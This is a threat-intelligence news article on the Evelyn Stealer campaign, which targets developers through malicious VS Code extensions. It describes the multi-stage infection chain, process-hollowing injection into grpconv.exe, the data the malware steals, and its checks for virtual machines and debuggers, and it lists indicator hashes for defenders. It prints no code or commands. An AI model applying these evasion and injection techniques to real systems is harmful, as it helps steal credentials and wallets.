Evelyn Stealer Campaign Weaponizes Malicious VS Code Extensions to Target Developers
A multi-stage campaign dubbed Evelyn Stealer is targeting software developers through malicious Visual Studio Code extensions, leveraging a sophisticated infection chain that hijacks browser sessions and exfiltrates cryptocurrency wallets and credentials.
A multi-stage information-stealing campaign tracked as Evelyn Stealer is specifically targeting software developers by weaponizing the Visual Studio Code (VS Code) extension ecosystem, according to new analysis from Trend Micro. First identified by Koi.ai on December 8, 2025, the campaign uses a carefully crafted infection chain that begins with a malicious extension disguised as a legitimate development tool. Trend Micro's analysis reveals a layered attack architecture designed to evade detection while harvesting sensitive developer data, including credentials, cryptocurrency wallets, and session tokens.
The initial infection vector is a malicious VS Code extension that masquerades as legitimate software. Once installed, the extension delivers a first-stage downloader that pretends to be a legitimate Lightshot DLL component, executed by genuine Lightshot.exe. The downloader, identified by the SHA256 hash `369479bd9a248c9448705c222d81ff1a0143343a138fc38fc0ea00f54fcc1598`, creates a mutex to prevent multiple infections and launches a hidden PowerShell command to retrieve and execute a second-stage payload stored in the Local Temp directory as "runtime.exe."
The second-stage payload is a sophisticated process-hollowing injector. Designated `iknowyou.model` (SHA256: `92af258d13494f208ccf76f53a36f288060543f02ed438531e0675b85da00430`), this component uses AES-256-CBC encryption to decrypt and inject the final Evelyn Stealer payload into the legitimate Windows process `grpconv.exe`. The injector creates a suspended instance of `grpconv.exe` via `CreateProcessA`, then decrypts the embedded payload using a hardcoded 32-byte AES key and 16-byte IV before performing injection and resuming execution.
The final payload, Evelyn Stealer (`EvelynStealer.exe`, SHA256: `aba7133f975a0788dd2728b4bbb1d7d948e50571a033a1e8f47a2691e98600c5`), dynamically resolves all necessary Windows APIs at runtime, including those needed for process injection, file operations, registry access, network communication, and clipboard access. The malware exfiltrates a broad range of sensitive data: browser credentials via DLL injection, clipboard contents, Wi-Fi credentials, screenshots, and cryptocurrency wallet files. Communication with the command-and-control (C&C) server occurs over FTP.
Evelyn employs multiple evasion techniques specifically designed to thwart security researchers and automated analysis environments. The malware performs GPU analysis to detect VMware, VirtualBox, Hyper-V, Parallels, QEMU, VirtIO, and basic display adapters. It checks the computer hostname for VM indicators, flags systems with less than 60 GB of disk space (typical of virtual machines), scans for VM-related processes such as `vmtoolsd.exe` and `vboxservice.exe`, and examines hardware registry keys for VM identifiers. Debugger detection and specialized checks for RDP sessions and Hyper-V are also implemented.
The campaign's focus on developers is notable because compromised development environments can serve as access points into broader organizational systems. By stealing credentials, API keys, and session tokens, the attackers can pivot to production systems, cloud resources, and CI/CD pipelines. Trend Micro notes that organizations with software development teams relying on VS Code and third-party extensions are at heightened risk, as are those with access to digital assets and cloud infrastructure.
TrendAI Vision One detects and blocks indicators of compromise associated with the Evelyn Stealer campaign, and Trend Micro has released tailored threat hunting queries and intelligence reports for its customers. The analysis underscores the growing trend of threat actors targeting the software supply chain through developer tools, following recent incidents involving malicious NPM packages and compromised IDE extensions. Developers and security teams are advised to carefully vet VS Code extensions, restrict extension installation to trusted sources, and monitor for suspicious processes such as `runtime.exe` or `grpconv.exe` exhibiting unusual behavior.